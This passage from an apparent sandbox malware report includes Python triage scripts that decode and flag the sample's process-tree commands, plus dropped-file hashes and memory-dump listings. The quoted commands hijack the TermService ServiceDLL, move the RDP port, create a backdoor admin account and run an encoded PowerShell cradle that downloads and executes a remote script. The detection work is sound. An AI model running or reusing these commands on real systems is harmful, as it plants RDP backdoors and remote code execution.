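The tree above is the part worth turning into detection logic: reg.exe moves the RDP listener to port 0x1C21 (7201), points the TermService ServiceDLL at C:\Windows\branding\mediasrv.png (a UPX-packed file per the YARA match above, which svchost will load in place of termsrv.dll), disables the WDDM driver for Terminal Services, and net.exe adds NT AUTHORITY\NETWORK SERVICE (the account TermService runs as) and the freshly created wgautilacc account to Administrators and Remote Desktop Users. The last PowerShell stage hides its download cradle behind -enc, which is base64 over the UTF-16LE script text. The Python below is an added example and not part of the sandbox report or the sample's code: it decodes that argument and runs a small set of rules over command lines copied from the tree. The rule names, regexes and the constructed list of command lines are ours; the one external assumption is that the legitimate ServiceDLL for TermService is %SystemRoot%\System32\termsrv.dll.

```python
"""Added triage example for the process tree above (not part of the sandbox
report or the sample): decode PowerShell -enc payloads and flag the command
lines that turn TermService into an RDP backdoor."""
import base64
import re
from typing import Dict, List, Optional

# Constructed sample input: command lines copied from the report's process tree,
# plus one WMIC recon line that must not produce a finding.
REPORT_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f',
    r'"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f',
    r'"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f',
    r'"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add',
    r'net.exe user wgautilacc o18EWFWJ /add',
    r'net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD',
    r'net.exe LOCALGROUP "Administrators" wgautilacc /ADD',
    "powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA",
    r"wmic path win32_VideoController get name",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-e(?:c|n|nc|ncoded\w*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.IGNORECASE)
# Assumed legitimate ServiceDLL for TermService (see lead-in); anything else is a hijack.
LEGIT_TERMSRV = re.compile(r"^(?:%systemroot%|c:\\windows)\\system32\\termsrv\.dll$", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind a -EncodedCommand argument, or None.
    The blob is base64 over the UTF-16LE script, which is why every second
    character of an ASCII-only payload decodes from an 'A' (the zero high byte)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(text: str) -> List[str]:
    return URL_RE.findall(text)


def servicedll_detail(path: str) -> Optional[str]:
    # None suppresses the finding when the value is the real termsrv.dll.
    if LEGIT_TERMSRV.match(path):
        return None
    return f"ServiceDLL -> {path} (expected %SystemRoot%\\System32\\termsrv.dll)"


# (rule name, pattern with one capture group, capture -> detail string or None)
RULES = [
    ("rdp_port_changed",
     re.compile(r"Terminal Server\\WinStations\\RDP-Tcp.*?/v\s+PortNumber\b.*?/d\s+(\S+)", re.I),
     lambda v: f"RDP-Tcp PortNumber -> {int(v, 0)}"),  # int(v, 0) accepts 0x1C21 or decimal
    ("termservice_servicedll_hijack",
     re.compile(r"services\\TermService\\parameters.*?/v\s+ServiceDLL\b.*?/d\s+(\S+)", re.I),
     servicedll_detail),
    ("rdp_wddm_driver_disabled",
     re.compile(r"Terminal Services.*?/v\s+fEnableWddmDriver\b.*?/d\s+(0)\b", re.I),
     lambda v: "fEnableWddmDriver = 0"),
    ("local_admin_added",
     re.compile(r'\bnet(?:1|\.exe)?"?\s+localgroup\s+"?Administrators"?\s+(.+?)\s+/add\b', re.I),
     lambda v: f"added to Administrators: {v}"),
    ("rdp_users_added",
     re.compile(r'\bnet(?:1|\.exe)?"?\s+localgroup\s+"Remote Desktop Users"\s+(\S+)\s+/add\b', re.I),
     lambda v: f"added to Remote Desktop Users: {v}"),
    ("local_user_created",
     re.compile(r'\bnet(?:1|\.exe)?"?\s+user\s+(\S+)\s+\S+\s+/add\b', re.I),
     lambda v: f"local account created: {v}"),
]


def triage(cmdlines: List[str]) -> List[Dict[str, str]]:
    """Run every rule over each command line and, where one exists, over the
    decoded -enc payload too, so the rules see the script that really ran."""
    findings: List[Dict[str, str]] = []
    for line in cmdlines:
        decoded = decode_encoded_command(line)
        if decoded is not None:
            for url in extract_urls(decoded):
                findings.append({"rule": "encoded_powershell_download", "detail": url, "cmdline": line})
        for name, pattern, describe in RULES:
            for text in ([line, decoded] if decoded else [line]):
                m = pattern.search(text)
                if m:
                    detail = describe(m.group(1))
                    if detail is not None:
                        findings.append({"rule": name, "detail": detail, "cmdline": line})
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_CMDLINES):
        print(f"{f['rule']:32} {f['detail']}")
```

Run stand-alone, the script reports the port change as 7201, the ServiceDLL swap to mediasrv.png, the WDDM change, the two group additions plus the account creation, and the decoded cradle's URL, which is the same URL the sandbox listed under Malware Config; the WMIC line produces nothing. The same rules can be pointed at Sysmon event 1 or 4688 command lines; matching on the decoded payload as well as the raw line is what keeps a cradle hidden behind -enc from slipping past URL-based indicators.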
Downloads

C:\Users\Admin\AppData\Local\Temp\RES1123.tmp
MD5: 56f6783e8460c1f78a233cca6f73a100
SHA1: 457abddbd948afd765ffb4e8f6f0ff80138ad4b2
SHA256: 1b764879f9a4608afa482a3396f81c08c9c500e1e5973fa09a4f815d6264e356
SHA512: b065ffe4ad15568740145e675c41f9f314dea9ad645c371b26b7354bb18e315973d6cbd5da6ae015c246c6812fc46bbe05221311b40d36cac6ac8679a4796b4b

C:\Users\Admin\AppData\Local\Temp\RES17BA.tmp
MD5: 0a1edf3372d4b98b768f820cdff07d11
SHA1: 9a03265e760731fb89813202c2a90a677ae89df3
SHA256: 1bcfae685002b93e3f0a187e2bfbbcec65dbc2b46bc72a7e8f72b9e695c44ea1
SHA512: 839b3f088360b0dc934643723d0babb7b85491109bd0d9cabddbc561df3addffa1a9c864ff17db16e8c4cb97db28e7c8232b4bdd3c78865c22a00aa1b8762020

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5: 906cfa662334c891a46689a3f1da9330
SHA1: eeea78f5017291d2bcc9455977849c075077a14a
SHA256: 5d411460ba068d64bdafd0c3697d1bbe19685789c1c086d6b6e9073fbb914275
SHA512: 7d25845ca882e48df6c2b9c8646990d5dcc396f60c587e5fafce1841624b009d44542e93488a71983c9d8f71c9a001b06d4602b8be6f958435753490f8a7196f

C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5: 28d9755addec05c0b24cca50dfe3a92b
SHA1: 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256: abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512: 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

C:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.dll
MD5: 09a68093dad29028b020aeeea9329b1d
SHA1: 62a9b5f375813d4917b42249d95cc8f0d9cd5142
SHA256: cd8b18073ecc484ff15c22fe7f263a8bf95ea978c0c6958495997f856a0a6f1b
SHA512: de32307d15a4110a02c46179921e238edaa992c788a7e1d49a173672212fc204ea049ed255a6d7cdbcc30fa51a11d0fde1de2b8f0ef884835277a5fd696ce707

C:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.dll
MD5: 6f19a0dbc09b64d3dd218d77e6eb903c
SHA1: e765633c09e689a492e49b5b3cb40c3a3167223a
SHA256: ee7e0d3807cbf64be54ee1579eeb519bafa4523ef8474862e844325be345df3c
SHA512: 24c18b39ae01b5cc4cc00d37933f1edd690dc392b495f13a83826f85bf3a6e1eb58e0dcc349894fe0e786a82b6cfdcdf9fb1d5c040ffccbdfc133981ebfc19c2

\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\CSCB729DAFD60D64B9A92E2826B327DF462.TMP
MD5: 2062d6b60fb3014ccd61c20cc56e7986
SHA1: 9c3dff7f6553eed53597513f55240a8b89bb211b
SHA256: 8b1fa6516df1816052da07a421e7901bdaf9645cbbaa7f115db6cfd2dc3f6287
SHA512: 9faf57c764ba8f6738afaad3ca0e23209cef2952687621d7a6dfeeaf6016e65534312b56862a229197d2a0c093c0fca5b803927197ebd91258885f74a891af8c

\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.0.cs
MD5: e0f116150ceec4ea8bb954d973e3b649
SHA1: 86a8e81c70f4cc265f13e8760cf8888a6996f0fd
SHA256: 511ea5f70cbc2f5d875f7dd035cb5203b119e22c3b131cc551d21d151c909d54
SHA512: 32f01c2658c0314709e5dedec9a6d9911d0a0d777f6856569e043f705d036ab10e996732303ecdffea912e783b79463bdc0ffaa4b8c9d7a1e06a9073cd263bec

\??\c:\Users\Admin\AppData\Local\Temp\sn53rhrj\sn53rhrj.cmdline
MD5: 15e43ff3b62e9f8f111785d5d854613d
SHA1: 12d27c534d685433787d61088a7a592a38d9d560
SHA256: 4570df7b3c3a4fe0975b222084f32e4f4ccbdb70ef406aea04f33fbf4c1cf993
SHA512: 80fef049432b8ad94f7d5db86926b0bda1aa2a6f046da5e43b04a1fdcb8aa308544390d2bb0c48bf8240cc5623d7b490591cfb695c9f907e278c2c5151d242af

\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\CSCAFBD4976229C4F7597F5B97153978B2D.TMP
MD5: b77d73717cbab75c6615b2fad6b4eea0
SHA1: 413c1b8c94b59ac08eee72d3ef421df9c360ddfd
SHA256: a5559257806e58c8bb58d29a1a4613b8169c93d7c0f6bfcd066661e83512d4d0
SHA512: 33653fa1770caeaa8b4b620e67a58c1186061df607e43359f8eefd5f4ccb3ec88bb3b5e1a16b16fcc38eb8ffd052941812416150396209d34dddca7c2ebdac0c

\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.0.cs
MD5: 9f8ab7eb0ab21443a2fe06dab341510e
SHA1: 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256: e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512: 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

\??\c:\Users\Admin\AppData\Local\Temp\yi2wujv5\yi2wujv5.cmdline
MD5: d4c76f845369468645e3e7ac75aca481
SHA1: 9673558eab6cfe7bc9035be194970a13a92bdbe1
SHA256: f6b044879224573c462ae7d46335bd8c0a82dab869f333889b2019906acf7f6f
SHA512: 6dee4de3a3f514fbc59c754ae16a720794f981a846942ca8609bd29a8234b38e38b3d7a2e6fd957640eeea00d630868d896675610ff7c95d3af67593a2ccf5a7

\Windows\Branding\mediasrv.png
MD5: b5a099246bec080e384b19fff56bb2cc
SHA1: 6f26990f3f471717c97dca80a2ccbf2eac952280
SHA256: 352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA512: 69dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
-
\Windows\Branding\mediasvc.pngMD5
cc59270baf11196c3414204c319f3be9
SHA1038e2aa526fad8eb762e21e9aed7eab4531d4e11
SHA2565c5890fdbc0c59e911168a0b618436e8fb76be6053ab0bfa2eec4f7f0e9267e6
SHA5128e54a2a636d2b745a9d8e0e51fd54ccb504ec348f86730b951c45feb21f743be448401f72f6d3498a78a9aa6eb4d46211c424fe8c8cb3eeaf6f2d8bc5dd6a632
-
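The dropped-file hashes above and the memory-region listing that follows are the parts of this report a responder will want in machine-readable form. The following is an added example, not part of the sandbox report or its tooling: it parses the listing in the extracted form shown on this page (algorithm label fused to the path or digest), validates each digest's length, matches digests computed from a file's bytes against the records per algorithm, and splits `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` names so the declared Filesize can be checked against the address range. The two sample entries are copied from the report's own list; the function and field names are this example's own.

```python
"""Parse a sandbox report's dropped-file and memory-dump listings.
Added example; not part of the report. Handles the extracted form in which
the algorithm label is fused to the path ('...ps1MD5') or the hash value
('SHA1<hex>')."""
import hashlib
import re
from dataclasses import dataclass

# Hex-digest length per algorithm; every parsed value is checked against it.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed sample: two entries copied from the report's dropped-file list.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\Windows\Branding\mediasrv.pngMD5
b5a099246bec080e384b19fff56bb2cc
SHA16f26990f3f471717c97dca80a2ccbf2eac952280
SHA256352fa41bf3319718aa0346e6feb3032c10241ca746ffd8acfe7cf5fe222be991
SHA51269dd0038b5911eb8a239262605283e1854b3a9c32da7665990cc2d38572c28f33f63ef3286abf85b82378e2cc791cb208e5de2e2c263286f088c6d9239060604
"""

LABELLED_HASH = re.compile(r"^(SHA1|SHA256|SHA512)([0-9A-Fa-f]+)$")
# memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp  or  memory/<pid>-<seq>-0x<addr>-mapping.dmp
MEMORY_NAME = re.compile(
    r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-(?:0x([0-9A-Fa-f]+)-memory|mapping)\.dmp$")
SIZE_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2}


@dataclass
class DroppedFile:
    path: str
    hashes: dict  # algorithm name -> lowercase hex digest


def _check_hex(algo, value):
    """Reject digests of the wrong length or with non-hex characters."""
    if len(value) != HASH_LENGTHS[algo] or re.fullmatch(r"[0-9a-f]+", value) is None:
        raise ValueError(f"bad {algo} digest: {value!r}")
    return value


def parse_dropped_files(text):
    """One DroppedFile per entry. Entries are separated by '-' lines; the header
    is '<path>MD5' and the MD5 value sits on the next line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    records, i = [], 0
    while i < len(lines):
        if lines[i] == "-":
            i += 1
            continue
        head = lines[i]
        if not head.endswith("MD5") or i + 1 >= len(lines):
            raise ValueError(f"malformed entry header: {head!r}")
        hashes = {"MD5": _check_hex("MD5", lines[i + 1].lower())}
        i += 2
        while i < len(lines):
            m = LABELLED_HASH.match(lines[i])
            if m is None:
                break
            hashes[m.group(1)] = _check_hex(m.group(1), m.group(2).lower())
            i += 1
        records.append(DroppedFile(path=head[:-len("MD5")], hashes=hashes))
    return records


def hash_bytes(data):
    """Digest file contents with every algorithm the report uses."""
    return {algo: hashlib.new(algo.lower(), data).hexdigest() for algo in HASH_LENGTHS}


def match_hashes(records, digests):
    """Paths whose stored digest equals a supplied digest of the same algorithm;
    comparison is per algorithm, so an MD5 is never compared with a SHA1."""
    return [rec.path for rec in records
            if any(rec.hashes.get(a) == v.lower() for a, v in digests.items())]


def parse_memory_region(name, filesize=None):
    """Split a dump name into pid, sequence number and address range, and check
    the declared Filesize (rounded to one decimal in the report) against
    end - start. Mapping dumps carry no range, so size_matches stays None."""
    m = MEMORY_NAME.match(name)
    if m is None:
        raise ValueError(f"unrecognised dump name: {name!r}")
    region = {"pid": int(m.group(1)), "seq": int(m.group(2)),
              "start": int(m.group(3), 16), "end": None, "size_matches": None}
    if m.group(4) is not None:
        region["end"] = int(m.group(4), 16)
    if filesize is not None and region["end"] is not None:
        num, unit = re.fullmatch(r"([\d.]+)\s*([KM]?B)", filesize.strip().upper()).groups()
        declared = float(num) * SIZE_UNITS[unit]
        tolerance = SIZE_UNITS[unit] * 0.05  # half of one decimal place of the unit
        region["size_matches"] = abs((region["end"] - region["start"]) - declared) <= tolerance
    return region


if __name__ == "__main__":
    for rec in parse_dropped_files(SAMPLE_LISTING):
        print(rec.path, rec.hashes["SHA256"])
    print(parse_memory_region(
        "memory/520-160-0x0000021CEC5F8000-0x0000021CEC5F9000-memory.dmp", "4KB"))
```

To hunt on a host, read each candidate file's bytes, pass them to `hash_bytes`, and feed the result to `match_hashes`; a hit on any one algorithm is enough, and a file whose SHA256 matches but whose path differs is still the same dropped artefact. The size check on memory dumps is a cheap consistency test for the listing itself: every region on this page spans exactly its declared size, for instance 0x...F8000 to 0x...F9000 is 0x1000 bytes, the 4KB shown.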
memory/8-351-0x0000000000000000-mapping.dmp
-
memory/520-160-0x0000021CEC5F8000-0x0000021CEC5F9000-memory.dmp Filesize 4KB
-
memory/520-156-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-131-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-138-0x0000021CEC5F3000-0x0000021CEC5F5000-memory.dmp Filesize 8KB
-
memory/520-139-0x0000021CEC5F6000-0x0000021CEC5F8000-memory.dmp Filesize 8KB
-
memory/520-137-0x0000021CEC5F0000-0x0000021CEC5F2000-memory.dmp Filesize 8KB
-
memory/520-126-0x0000021CEC5A0000-0x0000021CEC5A1000-memory.dmp Filesize 4KB
-
memory/520-128-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-162-0x0000021CEDD60000-0x0000021CEDD61000-memory.dmp Filesize 4KB
-
memory/520-125-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-124-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-123-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-146-0x0000021CEC710000-0x0000021CEC711000-memory.dmp Filesize 4KB
-
memory/520-122-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-161-0x0000021CED9D0000-0x0000021CED9D1000-memory.dmp Filesize 4KB
-
memory/520-121-0x0000000000000000-mapping.dmp
-
memory/520-129-0x0000021CEC780000-0x0000021CEC781000-memory.dmp Filesize 4KB
-
memory/520-127-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-135-0x0000021CD26B0000-0x0000021CD26B2000-memory.dmp Filesize 8KB
-
memory/520-155-0x0000021CEC750000-0x0000021CEC751000-memory.dmp Filesize 4KB
-
memory/584-367-0x0000000000000000-mapping.dmp
-
memory/752-352-0x0000000000000000-mapping.dmp
-
memory/884-142-0x0000000000000000-mapping.dmp
-
memory/1036-308-0x0000000000000000-mapping.dmp
-
memory/1048-360-0x0000000000000000-mapping.dmp
-
memory/1304-148-0x0000000000000000-mapping.dmp
-
memory/1388-250-0x0000000000000000-mapping.dmp
-
memory/1388-291-0x00000159997A8000-0x00000159997AA000-memory.dmp Filesize 8KB
-
memory/1388-290-0x00000159997A6000-0x00000159997A8000-memory.dmp Filesize 8KB
-
memory/1388-264-0x00000159997A3000-0x00000159997A5000-memory.dmp Filesize 8KB
-
memory/1388-263-0x00000159997A0000-0x00000159997A2000-memory.dmp Filesize 8KB
-
memory/1456-362-0x0000000000000000-mapping.dmp
-
memory/1712-176-0x0000024D28B60000-0x0000024D28B62000-memory.dmp Filesize 8KB
-
memory/1712-172-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-178-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-180-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-198-0x0000024D28B66000-0x0000024D28B68000-memory.dmp Filesize 8KB
-
memory/1712-170-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-221-0x0000024D28B68000-0x0000024D28B6A000-memory.dmp Filesize 8KB
-
memory/1712-171-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-169-0x0000000000000000-mapping.dmp
-
memory/1712-177-0x0000024D28B63000-0x0000024D28B65000-memory.dmp Filesize 8KB
-
memory/1712-173-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1712-175-0x0000024D103D0000-0x0000024D103D2000-memory.dmp Filesize 8KB
-
memory/1884-365-0x0000000000000000-mapping.dmp
-
memory/1904-371-0x0000000000000000-mapping.dmp
-
memory/1964-261-0x0000022050226000-0x0000022050228000-memory.dmp Filesize 8KB
-
memory/1964-223-0x0000022050223000-0x0000022050225000-memory.dmp Filesize 8KB
-
memory/1964-222-0x0000022050220000-0x0000022050222000-memory.dmp Filesize 8KB
-
memory/1964-210-0x0000000000000000-mapping.dmp
-
memory/1980-370-0x0000000000000000-mapping.dmp
-
memory/1984-366-0x0000000000000000-mapping.dmp
-
memory/2176-356-0x0000000000000000-mapping.dmp
-
memory/2536-136-0x0000000000000000-mapping.dmp
-
memory/2612-359-0x0000000000000000-mapping.dmp
-
memory/2800-363-0x0000000000000000-mapping.dmp
-
memory/2820-383-0x000001FDF9A53000-0x000001FDF9A55000-memory.dmp Filesize 8KB
-
memory/2820-390-0x000001FDF9A56000-0x000001FDF9A58000-memory.dmp Filesize 8KB
-
memory/2820-441-0x000001FDF9A58000-0x000001FDF9A59000-memory.dmp Filesize 4KB
-
memory/2820-346-0x0000000000000000-mapping.dmp
-
memory/2820-382-0x000001FDF9A50000-0x000001FDF9A52000-memory.dmp Filesize 8KB
-
memory/2820-374-0x0000000000000000-mapping.dmp
-
memory/3032-350-0x0000000000000000-mapping.dmp
-
memory/3084-369-0x0000000000000000-mapping.dmp
-
memory/3160-355-0x0000000000000000-mapping.dmp
-
memory/3172-353-0x0000000000000000-mapping.dmp
-
memory/3180-345-0x0000000000000000-mapping.dmp
-
memory/3396-373-0x0000000000000000-mapping.dmp
-
memory/3456-368-0x0000000000000000-mapping.dmp
-
memory/3464-306-0x0000000000000000-mapping.dmp
-
memory/3548-364-0x0000000000000000-mapping.dmp
-
memory/3576-354-0x0000000000000000-mapping.dmp
-
memory/3580-455-0x0000000000000000-mapping.dmp
-
memory/3640-151-0x0000000000000000-mapping.dmp
-
memory/3704-307-0x0000000000000000-mapping.dmp
-
memory/3812-349-0x0000000000000000-mapping.dmp
-
memory/3816-372-0x0000000000000000-mapping.dmp
-
memory/3924-456-0x0000000000000000-mapping.dmp
-
memory/3988-361-0x0000000000000000-mapping.dmp
-
memory/4064-117-0x000001B0A5DE0000-0x000001B0A5DE2000-memory.dmp Filesize 8KB
-
memory/4064-120-0x000001B0A5DE6000-0x000001B0A5DE7000-memory.dmp Filesize 4KB
-
memory/4064-119-0x000001B0A5DE5000-0x000001B0A5DE6000-memory.dmp Filesize 4KB
-
memory/4064-118-0x000001B0A5DE3000-0x000001B0A5DE5000-memory.dmp Filesize 8KB
-
memory/4064-115-0x000001B0C0150000-0x000001B0C041E000-memory.dmp Filesize 2.8MB